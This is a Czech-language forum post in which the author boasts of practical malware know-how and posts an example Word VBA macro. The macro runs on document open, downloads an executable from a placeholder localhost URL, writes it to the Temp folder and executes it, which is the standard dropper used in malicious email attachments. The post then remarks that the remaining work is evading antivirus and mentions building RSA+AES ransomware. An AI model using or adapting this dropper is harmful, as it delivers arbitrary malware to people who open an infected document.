Ten příspěvek teoretický byl. Ale jinak, pokud to jde a v rámci možností, jsem i praktik Např. zkoušel někdo ten doc od Jan Fiala? Já jo. Nebo emoteta? Nebo si udělal někdo svůj demo malware, který se šíří pomocí doc přílohy v mailu?
Tu máš příklad makra do wordu:

Private Sub Document_Open()
    Dim e As Object
    Set e = CreateObject("Microsoft.XMLHTTP")
    e.Open "GET", "http://localhost/m.exe", False
    e.send
    If e.Status = 200 Then
        Set o = CreateObject("ADODB.Stream")
        o.Open
        o.Type = 1
        o.Write e.responseBody
        o.SaveToFile Environ("Temp") & "\m.exe", 2
        o.Close
    End If
    Dim RunM
    RunM = Shell(Environ("Temp") & "\m.exe")
End Sub 

A pak už je to jen o tom tuto funkcionalitu udělat tak, aby ji nezachycoval třeba antivir. Pod m.exe pak může být co chce. A sleduje někdo chování zabezpečení? Já jo. A třeba ransomware (rsa+aes) jsem teoreticky schopen vytvořit taky a i další prvky malwaru, ale to už raději dělat ani nebudu.
Navíc i teoretické znalosti bohatě stačí na to, aby člověk mohl relevantně reagovat Kdo tu ve vlákně zodpověděl otázku tazatele? Já